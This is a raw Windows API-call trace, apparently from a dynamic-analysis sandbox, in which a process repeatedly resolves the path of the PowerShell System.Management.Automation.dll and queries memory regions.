	[0284.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.728] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.730] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.731] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.731] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.732] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.732] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.732] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.732] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.732] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.732] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.732] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.733] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.733] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.733] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.733] VirtualQuery (in: lpAddress=0x12b7a0, lpBuffer=0x12c660, dwLength=0x30 | out: lpBuffer=0x12c660*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.733] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.733] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.733] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.733] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.734] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xcdc63957, Data2=0x9e08, Data3=0x45ad, Data4=([0]=0xac, [1]=0x92, [2]=0x5, [3]=0x20, [4]=0x8e, [5]=0xdb, [6]=0x53, [7]=0xcd))) returned 0x0
	[0284.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.739] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.740] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.741] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.741] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.741] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.741] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.742] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.742] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
